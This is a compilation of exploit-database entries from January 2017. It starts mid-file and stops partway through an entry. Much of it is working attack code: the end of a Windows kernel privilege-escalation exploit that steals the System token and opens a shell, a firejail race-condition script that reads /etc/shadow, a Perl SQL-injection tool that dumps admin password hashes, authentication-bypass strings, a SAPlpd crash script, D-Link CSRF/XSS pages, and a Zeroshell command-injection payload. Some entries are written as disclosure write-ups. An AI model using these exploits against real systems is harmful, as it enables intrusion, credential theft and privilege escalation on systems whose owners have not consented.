if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) {
krnlbase = Bases[0];
}
return krnlbase;
}
// Get EPROCESS for System process
ULONG64 PsInitialSystemProcess()
{
// load ntoskrnl.exe
ULONG64 ntos = (ULONG64)LoadLibrary("ntoskrnl.exe");
// get address of exported PsInitialSystemProcess variable
ULONG64 addr = (ULONG64)GetProcAddress((HMODULE)ntos, "PsInitialSystemProcess");
FreeLibrary((HMODULE)ntos);
ULONG64 res = 0;
ULONG64 ntOsBase = GetNTOsBase();
// subtract addr from ntos to get PsInitialSystemProcess offset from base
if (ntOsBase) {
ReadFromAddress(addr - ntos + ntOsBase, (BYTE *)&res, sizeof(ULONG64));
}
return res;
}
// Get EPROCESS for current process
ULONG64 PsGetCurrentProcess()
{
ULONG64 pEPROCESS = PsInitialSystemProcess();// get System EPROCESS
// walk ActiveProcessLinks until we find our Pid
LIST_ENTRY ActiveProcessLinks;
ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), (BYTE *)&ActiveProcessLinks, sizeof(LIST_ENTRY));
ULONG64 res = 0;
while (TRUE) {
ULONG64 UniqueProcessId = 0;
// adjust EPROCESS pointer for next entry
pEPROCESS = (ULONG64)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(ULONG64);
// get pid
ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset, (BYTE *)&UniqueProcessId, sizeof(ULONG64));
// is this our pid?
if (GetCurrentProcessId() == UniqueProcessId) {
res = pEPROCESS;
break;
}
// get next entry
ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), (BYTE *)&ActiveProcessLinks, sizeof(LIST_ENTRY));
// if next same as last, we reached the end
if (pEPROCESS == (ULONG64)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(ULONG64))
break;
}
return res;
}
void main(int argc, char* argv[]) {
HDC hdc = GetDC(NULL);
HDC hMemDC = CreateCompatibleDC(hdc);
HGDIOBJ bitmap = CreateBitmap(0x5a, 0x1f, 1, 32, NULL);
HGDIOBJ bitobj = (HGDIOBJ)SelectObject(hMemDC, bitmap);
static POINT points[0x3fe01];
for (int l = 0; l < 0x3FE00; l++) {
points[l].x = 0x5a1f;
points[l].y = 0x5a1f;
}
points[2].y = 20;
points[0x3FE00].x = 0x4a1f;
points[0x3FE00].y = 0x6a1f;
if (!BeginPath(hMemDC)) {
fprintf(stderr, "[!] BeginPath() Failed: %x\r\n", GetLastError());
}
for (int j = 0; j < 0x156; j++) {
if (j > 0x1F && points[2].y != 0x5a1f) {
points[2].y = 0x5a1f;
}
if (!PolylineTo(hMemDC, points, 0x3FE01)) {
fprintf(stderr, "[!] PolylineTo() Failed: %x\r\n", GetLastError());
}
}
EndPath(hMemDC);
//Kernel Pool Fung=Shuei
fungshuei();
//getchar();
fprintf(stdout, "[+] Trigerring Exploit.\r\n");
if (!FillPath(hMemDC)) {
fprintf(stderr, "[!] FillPath() Failed: %x\r\n", GetLastError());
}
printf("%s\r\n", "Done filling.");
HRESULT res;
VOID *fake = VirtualAlloc(0x0000000100000000, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!fake) {
fprintf(stderr, "VirtualAllocFailed. %x\r\n", GetLastError());
}
memset(fake, 0x1, 0x100);
bits = malloc(0x1000);
memset(bits, 0x42, 0x1000);
for (int k=0; k < 5000; k++) {
res = GetBitmapBits(bitmaps[k], 0x1000, bits); //1685 * 2 * 1 + 1
if (res > 0x150) {
fprintf(stdout, "GetBitmapBits Result. %x\r\nindex: %d\r\n", res, k);
hManager = bitmaps[k];
hWorker = bitmaps[k + 1];
// Get Gh05 header to fix overflown header.
static BYTE Gh04[0x9];
fprintf(stdout, "\r\nGh04 header:\r\n");
for (int i = 0; i < 0x10; i++){
Gh04[i] = bits[0x1d0 + i];
fprintf(stdout, "%02x", bits[0x1d0 + i]);
}
// Get Gh05 header to fix overflown header.
static BYTE Gh05[0x9];
fprintf(stdout, "\r\nGh05 header:\r\n");
for (int i = 0; i < 0x10; i++) {
Gh05[i] = bits[0xd90 + i];
fprintf(stdout, "%02x", bits[0xd90 + i]);
}
// Address of Overflown Gh04 object header
static BYTE addr1[0x7];
fprintf(stdout, "\r\nPrevious page Gh04 (Leaked address):\r\n");
for (int j = 0; j < 0x8; j++) {
addr1[j] = bits[0x210 + j];
fprintf(stdout, "%02x", bits[0x210 + j]);
}
//Get pvscan0 address of second Gh05 object
static BYTE* pvscan[0x07];
fprintf(stdout, "\r\nPvsca0:\r\n");
for (int i = 0; i < 0x8; i++) {
pvscan[i] = bits[0xdf0 + i];
fprintf(stdout, "%02x", bits[0xdf0 + i]);
}
// Calculate address to overflown Gh04 object header.
addr1[0x0] = 0;
int u = addr1[0x1];
u = u - 0x10;
addr1[1] = u;
//Fix overflown Gh04 object Header
SetAddress(addr1);
WriteToAddress(Gh04);
// Calculate address to overflown Gh05 object header.
addr1[0] = 0xc0;
int y = addr1[1];
y = y + 0xb;
addr1[1] = y;
//Fix overflown Gh05 object Header
SetAddress(addr1);
WriteToAddress(Gh05);
// get System EPROCESS
ULONG64 SystemEPROCESS = PsInitialSystemProcess();
//fprintf(stdout, "\r\n%x\r\n", SystemEPROCESS);
ULONG64 CurrentEPROCESS = PsGetCurrentProcess();
//fprintf(stdout, "\r\n%x\r\n", CurrentEPROCESS);
ULONG64 SystemToken = 0;
// read token from system process
ReadFromAddress(SystemEPROCESS + gConfig.TokenOffset, (BYTE *)&SystemToken, 0x8);
// write token to current process
ULONG64 CurProccessAddr = CurrentEPROCESS + gConfig.TokenOffset;
SetAddress((BYTE *)&CurProccessAddr);
WriteToAddress((BYTE *)&SystemToken);
// Done and done. We're System :)
system("cmd.exe");
break;
}
if (res == 0) {
fprintf(stderr, "GetBitmapBits failed. %x\r\n", GetLastError());
}
}
getchar();
//clean up
DeleteObject(bitobj);
DeleteObject(bitmap);
DeleteDC(hMemDC);
ReleaseDC(NULL, hdc);
VirtualFree(0x0000000100000000, 0x100, MEM_RELEASE);
//free(points);
}
For those who only care about one thing: [the PoC is here.](https://rol.im/kpwned.zip)
Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41021.zip
## Overview
Cemu is a closed-source Wii U emulator developed by Exzap. New versions are released to those who donate to him via his Patreon first, then to the public one week later. According to its official website, Cemu "is not intended for general use yet", however it can run some games well.
It HLEs the Wii U OS APIs. For those who don't know, the Wii U runs executables in a modified ELF format that include additional PE-like import and export sections. Basically, the HLE here means each exported function from each shared library has been reimplemented, and runs in native code. That's a pretty large attack surface! So, when looking for bugs, I decided to start there.
## Finding bugs in Cemu HLE API emulation
Obviously, the first thing to do is to find where the API exports are set up so all of them can be annotated in IDA. I found a function at `0x1400AEDC0` (before relocation, cemu.exe is compiled with ASLR) that I labeled `set_up_emulated_API`. It takes three arguments: a pointer to a hashed (or obfuscated) shared library name, a pointer to a hashed (or obfuscated) exported function name, and a pointer to the function used for implementation. This function has a nice debug `printf` where it printed out the library name and exported function name, so I did things the long way and set a breakpoint there in x64dbg and labeled all the ~620(!) functions by hand. This took the better part of a day (however I did take breaks.)
Once I had all the functions labeled, I could go ahead and start looking for bugs. It was nice from my perspective that the emulated API functions did all the grunt work of endianness conversion of arguments and return values, so I didn't have to do anything of the sort myself. I first decided to check the more interestingly (for me) named functions, not long later I'd found a bug.
### sysapp!_SYSGetSystemApplicationTitleId
```c
uint64_t _SYSGetSystemApplicationTitleId(uint32_t index);
```
The implementation of this function just sets up a large array of title IDs (a title ID is a 64 bit integer that identifies "something that runs on the console", like a system application, firmware component or game, this has been used by Nintendo since the Wii and DSi, on console and handheld respectively) on the stack, then indexes it using the provided argument **without checking** and returns the array[index] to the emulator. What a perfect infoleak, to defeat ASLR later!
Exploiting this seems easy, just get the return address from the stack (index `37`), but it seems this isn't totally reliable, so instead I make a dummy call, then use index `52`, which seems to return an address inside the `cemu.exe` `.text` more reliably.
### padscore!KPADSetConnectCallback
```c
uint32_t KPADSetConnectCallback(uint32_t index,uint32_t value)
```
With an infoleak obtained, I just needed to find some (semi-)arbitrary write, and this took annoyingly longer to find. I found a few bugs that seemed promising but ultimately turned out to be unexploitable. Finally, after checking some of the functions not related to the OS, I found this function. Basically, it writes to an array of 32-bit integers (obviously the intended use of that array is function pointers inside the emulated system), in the `.data` section, with no checking of the provided index. Even better, it returns the old value (although I never needed to use this functionality when exploiting).
The array is unfortunately near the end of `.data`, but that doesn't really matter, as it's stored *before* a nice array of KPAD C++ objects with vtables that I can clobber -- and if a pointer inside one of the objects happens to not be NULL, this same function makes a vtable call twice! Even better!
## Exploitation
My PoC clobbers the first KPAD object (player 1 gamepad): it nulls out the checked pointer so no vtable calls are made while things are being overwritten, it overwrites the vtable pointers, sets up the ROP chain, sets up the stack pivot, makes that pointer non-NULL, and makes a dummy call to `KPADSetConnectCallback` to get ROP.
Heh, I just made that sound easy. It wasn't.
Let's see, it was annoying to find a stack pivot in the first place? But then I found the perfect pair of gadgets:
```
0x000000014015d404 : add rcx, 0x10 ; jmp qword ptr [rax]
0x0000000140228371 : push rcx ; pop rsp ; ret
```
When the first one gets called, `rcx` has the address of the vtable array, and `rax` has the address of the first element of the vtable array (which isn't actually used, so it's a perfect place to put a gadget address).
The ROP chain is written using `KPADSetConnectCallback` just like everything else, all this is written into a part of memory that contains UTF-16LE strings for controller mappings, that can only be seen if you open the controller settings. The ROP chain itself just grabs the address of the shellcode inside emulated RAM, `memcpy`s it to RWX memory allocated for the dynamic recompiler, and jumps there. Sure, it doesn't work if you deliberately disable the dynamic recompiler, but firstly, who even does that?!, and secondly, I'll leave the making of a ROP chain that uses `VirtualAlloc` to someone else if they wish.
The shellcode itself is just metasploit `windows/x64/exec` running `calc.exe`. Nothing special.
One final thing: when testing, I noticed that the emulator crashed if controller one was set up properly. It's because I initially thought the pointer that got checked for being NULL was a boolean or something else, and I'd only zeroed out the lower 32 bits of it. Whoops.
## Compiling the PoC
Linked at the top of the page is an archive including the PoC itself as `calc.rpx` plus source plus modified and additional import library dependencies (as source and binaries). I used [wut](https://github.com/decaf-emu/wut) to make the PoC which obviously depends on [devkitPro/devkitPPC](http://devkitpro.org/). After compiling wut successfully I had to make library additions, as both of the vulnerable functions were not included in the library set. Luckily enough it was very easy to make additions to the import libraries.
## Timeline
2016-12-30: started reversing
2016-12-31: found exploits
2017-01-01: made PoC, made initial contact with developer
2017-01-02: developer replies, said fixes have been made
2017-01-02: asked for release date
2017-01-02: reply: release date unknown, "in 1-2 weeks maybe"
2017-01-09: release to patrons, public disclosure
# firejail advisory for TOCTOU in --get and --put (local root)
Releasing a brief advisory/writeup about a local root privesc found in firejail that we reported back in Nov, 2016. This is in response to a recent [thread](http://seclists.org/oss-sec/2017/q1/20) on oss-sec where people seem interested in details of firejail security issues. This particular vulnerability was fixed in commit [e152e2d](https://github.com/netblue30/firejail/commit/e152e2d067e17be33c7e82ce438c8ae740af6a66) but no CVE was assigned.
## Vulnerability
This is a TOCTOU (race condition) bug when testing access permissions with access() and then calling copy_file(). At the time of discovery, it was clear the code suffered from many insecure coding constructs like this and much more -- but there was no guideline around making security related bug reports (other than using the public issue tracker).
### Code: src/firejail/ls.c
~~~~
void sandboxfs(int op, pid_t pid, const char *path) {
EUID_ASSERT();
// if the pid is that of a firejail process, use the pid of the first child process
EUID_ROOT();
char *comm = pid_proc_comm(pid);
EUID_USER();
if (comm) {
if (strcmp(comm, "firejail") == 0) {
pid_t child;
if (find_child(pid, &child) == 0) {
pid = child;
}
}
free(comm);
}
// check privileges for non-root users
uid_t uid = getuid();
if (uid != 0) {
uid_t sandbox_uid = pid_get_uid(pid);
if (uid != sandbox_uid) {
fprintf(stderr, "Error: permission denied.\n");
exit(1);
}
}
// full path or file in current directory?
char *fname;
if (*path == '/') {
fname = strdup(path);
if (!fname)
errExit("strdup");
}
else if (*path == '~') {
if (asprintf(&fname, "%s%s", cfg.homedir, path + 1) == -1)
errExit("asprintf");
}
else {
fprintf(stderr, "Error: Cannot access %s\n", path);
exit(1);
}
// sandbox root directory
char *rootdir;
if (asprintf(&rootdir, "/proc/%d/root", pid) == -1)
errExit("asprintf");
if (op == SANDBOX_FS_LS) {
EUID_ROOT();
// chroot
if (chroot(rootdir) < 0)
errExit("chroot");
if (chdir("/") < 0)
errExit("chdir");
// access chek is performed with the real UID
if (access(fname, R_OK) == -1) {
fprintf(stderr, "Error: Cannot access %s\n", fname);
exit(1);
}
// list directory contents
struct stat s;
if (stat(fname, &s) == -1) {
fprintf(stderr, "Error: Cannot access %s\n", fname);
exit(1);
}
if (S_ISDIR(s.st_mode)) {
char *rp = realpath(fname, NULL);
if (!rp) {
fprintf(stderr, "Error: Cannot access %s\n", fname);
exit(1);
}
if (arg_debug)
printf("realpath %s\n", rp);
char *dir;
if (asprintf(&dir, "%s/", rp) == -1)
errExit("asprintf");
print_directory(dir);
free(rp);
free(dir);
}
else {
char *rp = realpath(fname, NULL);
if (!rp) {
fprintf(stderr, "Error: Cannot access %s\n", fname);
exit(1);
}
if (arg_debug)
printf("realpath %s\n", rp);
char *split = strrchr(rp, '/');
if (split) {
*split = '\0';
char *rp2 = split + 1;
if (arg_debug)
printf("path %s, file %s\n", rp, rp2);
print_file_or_dir(rp, rp2, 1);
}
free(rp);
}
}
// get file from sandbox and store it in the current directory
else if (op == SANDBOX_FS_GET) {
// check source file (sandbox)
char *src_fname;
if (asprintf(&src_fname, "%s%s", rootdir, fname) == -1)
errExit("asprintf");
EUID_ROOT();
struct stat s;
if (stat(src_fname, &s) == -1) {
fprintf(stderr, "Error: Cannot access %s\n", fname);
exit(1);
}
// try to open the source file - we need to chroot
pid_t child = fork();
if (child < 0)
errExit("fork");
if (child == 0) {
// chroot
if (chroot(rootdir) < 0)
errExit("chroot");
if (chdir("/") < 0)
errExit("chdir");
// drop privileges
drop_privs(0);
// try to read the file
if (access(fname, R_OK) == -1) {
fprintf(stderr, "Error: Cannot read %s\n", fname);
exit(1);
}
exit(0);
}
// wait for the child to finish
int status = 0;
waitpid(child, &status, 0);
if (WIFEXITED(status) && WEXITSTATUS(status) == 0);
else
exit(1);
EUID_USER();
// check destination file (host)
char *dest_fname = strrchr(fname, '/');
if (!dest_fname || *(++dest_fname) == '\0') {
fprintf(stderr, "Error: invalid file name %s\n", fname);
exit(1);
}
if (access(dest_fname, F_OK) == -1) {
// try to create the file
FILE *fp = fopen(dest_fname, "w");
if (!fp) {
fprintf(stderr, "Error: cannot create %s\n", dest_fname);
exit(1);
}
fclose(fp);
}
else {
if (access(dest_fname, W_OK) == -1) {
fprintf(stderr, "Error: cannot write %s\n", dest_fname);
exit(1);
}
}
// copy file
EUID_ROOT();
copy_file(src_fname, dest_fname, getuid(), getgid(), 0644);
printf("Transfer complete\n");
EUID_USER();
}
free(fname);
free(rootdir);
exit(0);
}
~~~~
### Code: src/firejail/util.c
~~~~
int copy_file(const char *srcname, const char *destname, uid_t uid, gid_t gid, mode_t mode) {
assert(srcname);
assert(destname);
// open source
int src = open(srcname, O_RDONLY);
if (src < 0) {
fprintf(stderr, "Warning: cannot open %s, file not copied\n", srcname);
return -1;
}
// open destination
int dst = open(destname, O_CREAT|O_WRONLY|O_TRUNC, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH);
if (dst < 0) {
fprintf(stderr, "Warning: cannot open %s, file not copied\n", destname);
close(src);
return -1;
}
// copy
ssize_t len;
static const int BUFLEN = 1024;
unsigned char buf[BUFLEN];
while ((len = read(src, buf, BUFLEN)) > 0) {
int done = 0;
while (done != len) {
int rv = write(dst, buf + done, len - done);
if (rv == -1) {
close(src);
close(dst);
return -1;
}
done += rv;
}
}
if (fchown(dst, uid, gid) == -1)
errExit("fchown");
if (fchmod(dst, mode) == -1)
errExit("fchmod");
close(src);
close(dst);
return 0;
}
</snip>
~~~~
## Testing
### Our Dockerfile
~~~~
FROM ubuntu:latest
ENV wdir /root/firejail
RUN apt-get update && apt-get install -y git gcc make
RUN useradd -ms /bin/bash daniel && echo "daniel:password" | chpasswd
RUN git clone https://github.com/netblue30/firejail.git ${wdir}
WORKDIR ${wdir}
RUN git reset --hard 81467143ee9c47d9c90e97fb55baf2d47702d372
RUN ./configure && make && make install
~~~~
### Our exploit
This will exploit the --get command to read /etc/shadow and print back to the console. Just copy and paste into your shell:
~~~~
#dropper
cat > gexp.sh <<GUEST_JAIL_SCRIPT_EOF
mkdir -p /tmp/exploit
cat > /tmp/exploit/gaolbreak.c <<TOCTOU_POC_END
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
int main(int argc, char **argv)
{
char *fl = "/etc/shadow";
if(argc > 1) {
fl = argv[1];
}
while(1) {
int fd = open("owned", O_CREAT | O_RDWR, 0777);
if(fd == -1) {
perror("open");
exit(1);
}
close(fd);
remove("owned");
symlink(fl, "owned");
remove("owned");
}
}
TOCTOU_POC_END
cd /tmp/exploit
gcc ./gaolbreak.c -o gaolbreak
# XXX: change argv[1] to whatever you want
./gaolbreak /etc/shadow
GUEST_JAIL_SCRIPT_EOF
# run the dropper (symlink attack) in a jail
chmod +x ./gexp.sh
firejail --noprofile --force --name=el ./gexp.sh &
# win race using the vulnerable 'firejail --get' command.
mkdir exploitel
cd exploitel
while [ 1 ] ; do nice -n 19 firejail --get=$(pgrep -f '^firejail.*--name=el' -n) /tmp/exploit/owned >/dev/null 2>&1; cat owned 2>/dev/null; done
~~~~
# # # # #
# Vulnerability: Travel Portal Script v9.33 - SQL Injection Web Vulnerability
# Google Dork: Travel Portal Script
# Date:11.01.2017
# Vendor Homepage: http://itechscripts.com/travel-portal-script/
# Script Name: Travel Portal Script
# Script Version: v9.33
# Script Buy Now: http://itechscripts.com/travel-portal-script/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
#
# SQL Injection/Exploit :
# http://localhost/[PATH]/pages.php?id=[SQL]
# http://localhost/[PATH]/hotel.php?hid=[SQL]
# http://localhost/[PATH]/holiday.php?hid=[SQL]
# E.t.c.... Other files, too. There are security vulnerabilities.
# Category,User E.t.c.. Add/Edit/Delete There are security vulnerabilities.
#
# # # # #
# # # # #
# Vulnerability: Movie Portal Script v7.35 - SQL Injection Web Vulnerability
# Google Dork: Movie Portal Script
# Date:11.01.2017
# Vendor Homepage: http://itechscripts.com/movie-portal-script/
# Script Name: Movie Portal Script
# Script Version: v7.35
# Script Buy Now: http://itechscripts.com/movie-portal-script/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
#
# SQL Injection/Exploit :
# http://localhost/[PATH]/artist.php?a=[SQL]
# http://localhost/[PATH]/movie.php?f=[SQL]
# E.t.c.... Other files, too. There are security vulnerabilities.
# Category,User E.t.c.. Add/Edit/Delete There are security vulnerabilities.
# # # # #
In modules/codec/adpcm.c, VLC can be made to perform an out-of-bounds
write with user-controlled input.
The function DecodeAdpcmImaQT at adpcm.c:595 allocates a buffer which
is filled with bytes from the input stream. However, it does not check
that the number of channels in the input stream is less than or equal
to the size of the buffer, resulting in an out-of-bounds write. The
number of channels is clamped at <= 5.
adpcm_ima_wav_channel_t channel[2];
...
for( i_ch = 0; i_ch < p_dec->fmt_in.audio.i_channels; i_ch++ )
{
channel[i_ch].i_predictor = (int16_t)((( ( p_buffer[0] << 1 )|(
p_buffer[1] >> 7 ) ))<<7);
channel[i_ch].i_step_index = p_buffer[1]&0x7f;
...
The mangling of the input p_buffer above and in
AdpcmImaWavExpandNibble() makes this difficult to exploit, but there
is a potential for remote code execution via a malicious media file.
POC:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41025.mov
# Vulnerability: Dating Script v3.25 - SQL Injection
# Date: 11.01.2017
# Software link: http://itechscripts.com/dating-script/
# Demo: http://dating.itechscripts.com
# Price: 199$
# Category: webapps
# Exploit Author: Dawid Morawski
# Website: http://www.morawskiweb.pl
# Contact: dawid.morawski1990@gmail.com
#######################################
1. Description
An attacker can exploit this vulnerability to read from the database.
2. SQL Injection / Proof of Concept:
Vulnerable Parametre: id
http://localhost/[PATH]/see_more_details.php?id=[SQL]
# Vulnerability: Job Portal Script v9.11 Authentication bypass
# Date: 12.01.2017
# Software link: http://itechscripts.com/job-portal-script/
# Demo: http://job-portal.itechscripts.com
# Price: 199$
# Category: webapps
# Exploit Author: Dawid Morawski
# Website: http://www.morawskiweb.pl
# Contact: dawid.morawski1990@gmail.com
#######################################
Go to http://localhost/[PATH]/admin/index.php and set:
Username: admin
Password: ' or '1'='1
# Vulnerability: Online Food Delivery v2.04 Authentication bypass
# Date: 12.01.2017
# Software link: http://itechscripts.com/food-delivery/
# Demo: http://restaurant.itechscripts.com
# Price: 49$
# Category: webapps
# Exploit Author: Dawid Morawski
# Website: http://www.morawskiweb.pl
# Contact: dawid.morawski1990@gmail.com
#######################################
Go to http://localhost/[PATH]/admin/admin_login.php and set:
Username: 1' or 1=1 -- -
Password: anything
# Exploit Title: SAPlpd 7.40 Denial of Service
# Date: 2016-12-28
# Exploit Author: Peter Baris
# Exploit code: http://saptech-erp.com.au/resources/saplpd_dos.zip
# Version: 7.40 all patch levels (as a part of SAPGui 7.40)
# Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64
import socket
# Opcodes 03h and 04h are vulnerable to bad characters 00h and 0ah
# So you can modify the DoS accordingly
# The added 800 A's are just to show, that you can deliver a complete shell with the command
DoS = ("\x03"+"\x0a"+"\x41"*800)
s = socket.socket()
s.settimeout(1)
s.connect(('192.168.198.132', 515))
print("[*] Crashing SAPlpd 7.40")
print("[*] Payload length: "+str(len(DoS))+" bytes")
s.send(DoS)
s.close()
# Exploit Title: aSc Timetables 2017 input field buffer overflow and code execution
# Date: 2017-01-12
# Exploit Author: Peter Baris
# Exploit code: http://saptech-erp.com.au/resources/Timetables.zip
# Exploit documentation: http://saptech-erp.com.au/resources/TimeTables_2017.pdf
# Software Link: http://www.asctimetables.com/download/aScTimeTables.exe
# Version: 1.0.0.1
# Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64, Windows Server 2012 R2 x64, Windows Server 2016 x64
POC:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41031.zip
#!/usr/bin/perl -w
# iTechscripts Freelancer Script v5.11 (sk) SQL Injection Vulnerability
# Author : v3n0m
# Contact : v3n0m[at]outlook[dot]com
# Date : January, 11-2017 GMT +7:00 Jakarta, Indonesia
# Software : Freelancer Script
# Version : 5.11 Lower versions may also be affected
# Price : US$199.00
# Link : http://itechscripts.com/freelancer-script/
# Greetz : YOGYACARDERLINK, CAFE BMW, Dhea Fathin Karima & YOU !!
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
}
clear();
print "|----------------------------------------------------|\n";
print "| iTechscripts Freelancer Script 5.11 SQLi Exploiter |\n";
print "| Coded by : v3n0m |\n";
print "| Greetz : YOGYACARDERLINK |\n";
print "|----------------------------------------------------|\n";
use LWP::UserAgent;
print "\nInsert Target:[http://wwww.target.com/path/]: ";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress...\n";
print "\n";
$concat="group_concat(username,char(58),password)";
$table="admin_user";
$dheakarima = LWP::UserAgent->new() or die "Could not initalize browser\n";
$dheakarima->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "category.php?sk=-9999+union+all+select+null,null,".$concat.",null+from/**/".$table."+--+";
$xf2r = $dheakarima->request(HTTP::Request->new(GET=>$host));
$answer = $xf2r->content;
if ($answer =~/([0-9a-fA-F]{32})/) {
print "\n[+] Admin Password : $1\n";
print "[+] Success !! Check target for details...\n";
print "\n";
}
else{print "\n[-] Failed\n";
}
# Title: D-Link DIR-615 Multiple Vulnerabilities
# Date: 10-01-2017
# Hardware Version: E3
# Firmware Version: 5.10
# Tested on: Windows 8 64-bit
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
# Original write-up:https://osandamalith.com/2017/01/04/d-link-dir-615-open-redirection-and-xss/
Overview
--------
The 'apply.cgi' file was vulnerable to Open Redirection and XSS. Inside the router many other cgi files too use this functionality in 'apply.cgi'. For example the 'ping_response.cgi' file.
Open Redirection
-----------------
# apply.cgi
<html>
<!-- @OsandaMalith -->
<body>
<form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
<input type="hidden" name="html_response_page" value="https://google.lk" />
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
<img src=x onerror="exploit.submit()"/>
</form>
</body>
</html>
# ping_response.cgi
<html>
<!-- @OsandaMalith -->
<body>
<form action="http://192.168.0.1/ping_response.cgi" method="POST" id="exploit">
<input type="hidden" name="html_response_page" value="https://google.lk" />
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
<input type="hidden" name="ping_ipaddr" value="192.168.0.101" />
<input type="hidden" name="ping" value="Ping" />
<img src=x onerror="exploit.submit()"/>
</form>
</body>
</html>
POST XSS
---------
# apply.cgi
<html>
<!-- @OsandaMalith -->
<body>
<form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
<input type="hidden" name="html_response_page" value="javascript:confirm(/@OsandaMalith/)" />
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
<img src=x onerror="exploit.submit()"/>
</form>
</body>
</html>
# ping_response.cgi
<html>
<!-- @OsandaMalith -->
<body>
<form action="http://192.168.0.1/ping_response.cgi" method="POST" id="exploit">
<input type="hidden" name="html_response_page" value="javascript:confirm(/@OsandaMalith/)" />
<input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
<input type="hidden" name="ping_ipaddr" value="127.0.0.1" />
<input type="hidden" name="ping" value="Ping" />
<img src=x onerror="exploit.submit()"/>
</form>
</body>
</html>
Disclosure Timeline
--------------------
12/19/16: Reported to D-Link
12/21/16: Security Patch released
ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-615/REVT/DIR-615_REVT_RELEASE_NOTES_20.12PTb01.pdf
# # # # #
# Vulnerability: School Management Software v2.75 - SQL Injection Web Vulnerability
# Google Dork: School Management Software
# Date:11.01.2017
# Vendor Homepage: http://itechscripts.com/school-management-software/
# Script Name: School Management Software
# Script Version: v2.75
# Script Buy Now: http://itechscripts.com/school-management-software/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
#
# SQL Injection/Exploit :
# http://localhost/[PATH]//notice-edit.php?aid=[SQL]
# E.t.c.... Other files, too. There are security vulnerabilities.
# # # # #
# # # # #
# Vulnerability:(Profile) Arbitrary Shell Upload
# Google Dork: Airbnb Clone Script
# Date:11.01.2017
# Vendor Homepage: http://www.tibsolutions.com/airbnb-clone/
# Script Name: Airbnb Clone Script
# Script Buy Now: http://www.hotscripts.com/listing/airbnb-clone-tibsolutions/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
#Exploit :
#Register in site ... and login
#Goto profil
#Empty file .htaccess and Shell.php...
#
# # # # #
# Vulnerability:(Profile) Arbitrary Shell Upload
# Google Dork: Penny Auction Script
# Date:11.01.2017
# Vendor Homepage: http://www.tibsolutions.com/tibs-eauction/
# Script Name: Penny Auction Script
# Script Buy Now: http://www.hotscripts.com/listing/penny-auction-software-156843/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
#Exploit :
#Register in site ... and login
#Goto profil
#Empty file .htaccess and Shell.php...
# # # # #
# Vulnerability:(Profile) Arbitrary Shell Upload
# Google Dork: ECommerce-Multi-Vendor Software
# Date:11.01.2017
# Vendor Homepage: http://www.tibsolutions.com/multi-vendor/
# Script Name: ECommerce-Multi-Vendor Software
# Script Buy Now: http://www.tibsolutions.com/multi-vendor/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
#Exploit :
#Register in site ... and login
#Goto profil
#Empty file .htaccess and Shell.php...
# # # # #
# Vulnerability:(Profile) Arbitrary Shell Upload
# Google Dork: ECommerce-TIBSECART
# Date:11.01.2017
# Vendor Homepage: http://www.tibsolutions.com/tibs-ecart/
# Script Name: ECommerce-TIBSECART
# Script Buy Now: http://www.tibsolutions.com/tibs-ecart/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
#Exploit :
#Register in site ... and login
#Goto profil
#Empty file .htaccess and Shell.php...
####################################################################################################################################
# Exploit Title: Zeroshell - Net Services Unauthenticated Remote Code Execution | RCE
# Date: 13.01.2017
# Exploit Author: Ozer Goker
# Vendor Homepage: http://www.zeroshell.org
# Software Link: www.zeroshell.org/download/
# Version: 3.6.0 & 3.7.0
####################################################################################################################################
Introduction
Zeroshell is a small Linux distribution for servers and embedded devices with the aim to provide network services. It is available in the form of live CD or compact Flash image and it can be configured using a web browser. The main features of Zeroshell include: load balancing and failover of multiple Internet connections, UMTS/HSDPA connections by using 3G modems, RADIUS server for providing secure authentication and automatic management of encryption keys to wireless networks, captive portal to support web login, and many others.
Vulnerabilities: Unauthenticated Remote Code Execution | RCE
RCE details:
####################################################################################################################################
RCE 1
URL
http://192.168.0.75/cgi-bin/kerbynet?Action=StartSessionSubmit&User=%27%26cat%20/etc/passwd%26%27&PW=
METHOD
Get,Post
PARAMETER
User
PAYLOAD
%27%26cat%20/etc/passwd%26%27
####################################################################################################################################
RCE 2
URL
